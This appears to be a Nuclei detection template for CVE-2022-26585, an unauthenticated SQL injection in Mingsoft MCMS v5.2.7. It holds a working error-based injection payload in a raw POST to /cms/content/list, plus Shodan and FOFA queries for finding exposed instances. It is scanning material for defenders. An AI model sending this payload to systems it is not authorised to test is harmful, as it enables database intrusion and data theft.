Description
Mingsoft MCMS v5.2.7 contains an SQL injection vulnerability via /cms/content/list that allows unauthenticated attackers to execute arbitrary SQL commands on the affected database server.
Mingsoft MCMS v5.2.7 contains an SQL injection vulnerability via /cms/content/list that allows unauthenticated attackers to execute arbitrary SQL commands on the affected database server.
id: CVE-2022-26585
info:
name: Mingsoft MCMS v5.2.7 - SQL Injection
author: ritikchaddha
severity: critical
description: |
Mingsoft MCMS v5.2.7 contains an SQL injection vulnerability via /cms/content/list that allows unauthenticated attackers to execute arbitrary SQL commands on the affected database server.
impact: |
Unauthenticated attackers can execute arbitrary SQL commands through the categoryId parameter in /cms/content/list, potentially extracting sensitive database information, modifying data, or compromising the entire Mingsoft MCMS database.
remediation: |
Upgrade Mingsoft MCMS to version 5.2.8 or later, which contains patches for this vulnerability.
reference:
- https://gitee.com/mingSoft/MCMS/issues/I4W1S9
- https://nvd.nist.gov/vuln/detail/CVE-2022-26585
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-26585
cwe-id: CWE-89
epss-score: 0.05475
epss-percentile: 0.9235
cpe: cpe:2.3:a:mingsoft:mcms:5.2.7:*:*:*:*:*:*:*
metadata:
vendor: mingsoft
product: mcms
verified: true
max-request: 1
shodan-query: http.favicon.hash:1464851260
fofa-query: icon_hash="1464851260"
tags: cve,cve2022,mingsoft,mcms,sqli,vuln
variables:
num: "999999999"
http:
- raw:
- |
POST /cms/content/list HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
categoryId=2' AND GTID_SUBSET(CONCAT(0x716a717871,md5({{num}}),0x716a627a71),3762) AND 'EIVI'='EIVI
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'c8c605999f3d8352d7bb792cf'
- type: status
status:
- 200
- 500
# digest: 4a0a00473045022100c12f10be57ac041f02eda359d27b936241ecb3626a883216d289abbd0d86a35d02202fc0782790c8ec47b9ccdb2500191a5b1114a7b38fabfc890099cff92a10c6d7:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.